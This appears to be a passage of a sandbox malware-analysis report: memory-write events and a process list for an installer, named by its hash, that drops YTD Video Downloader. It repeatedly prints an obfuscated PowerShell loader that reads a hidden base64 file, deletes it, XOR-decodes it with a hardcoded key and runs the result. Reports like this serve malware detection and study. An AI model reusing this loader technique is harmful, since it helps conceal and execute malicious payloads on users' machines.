PID 1576 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 4584 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 1576 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 4584 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe C:\Windows\explorer.exe
PID 2600 wrote to memory of 3028 N/A C:\Windows\explorer.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2600 wrote to memory of 3028 N/A C:\Windows\explorer.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1200 wrote to memory of 4584 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 1200 wrote to memory of 4584 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 1200 wrote to memory of 4584 N/A C:\Windows\explorer.exe C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe
PID 3028 wrote to memory of 2184 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 2184 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3028 wrote to memory of 5784 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp" /SL5="$902C2,116245401,999936,C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe

"C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "http://www.ytddownloader.com/thankyou.html?isn=CC0F6E83FD38442798C60B854E5A05E8&lang=1033&cid=09d1b505c20534e1a363f3227ff516a5&oldVer=&newVer=5.9.18&kt=ytdd&pv=0"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$f7333f90b386ed0b91c1ce090ef9fe1a='C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63';$6cb8edde4790dfa8fab26a3ddc7628da='hGjHEuNxbBWTCcFKUfkwiRJXdYmsoDvASLnQyeqrVpIgtZOzMPal';$ec033b62faa49304b919b29604a024eb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f7333f90b386ed0b91c1ce090ef9fe1a));remove-item $f7333f90b386ed0b91c1ce090ef9fe1a;for($i=0;$i -lt $ec033b62faa49304b919b29604a024eb.count;){for($j=0;$j -lt $6cb8edde4790dfa8fab26a3ddc7628da.length;$j++){$ec033b62faa49304b919b29604a024eb[$i]=$ec033b62faa49304b919b29604a024eb[$i] -bxor $6cb8edde4790dfa8fab26a3ddc7628da[$j];$i++;if($i -ge $ec033b62faa49304b919b29604a024eb.count){$j=$6cb8edde4790dfa8fab26a3ddc7628da.length}}};$ec033b62faa49304b919b29604a024eb=[System.Text.Encoding]::UTF8.GetString($ec033b62faa49304b919b29604a024eb);iex $ec033b62faa49304b919b29604a024eb;"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\explorer.exe

"C:\Windows\explorer.exe" "C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/thankyou.html?isn=CC0F6E83FD38442798C60B854E5A05E8&lang=1033&cid=09d1b505c20534e1a363f3227ff516a5&oldVer=&newVer=5.9.18&kt=ytdd&pv=0

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

"C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eee646f8,0x7ff9eee64708,0x7ff9eee64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

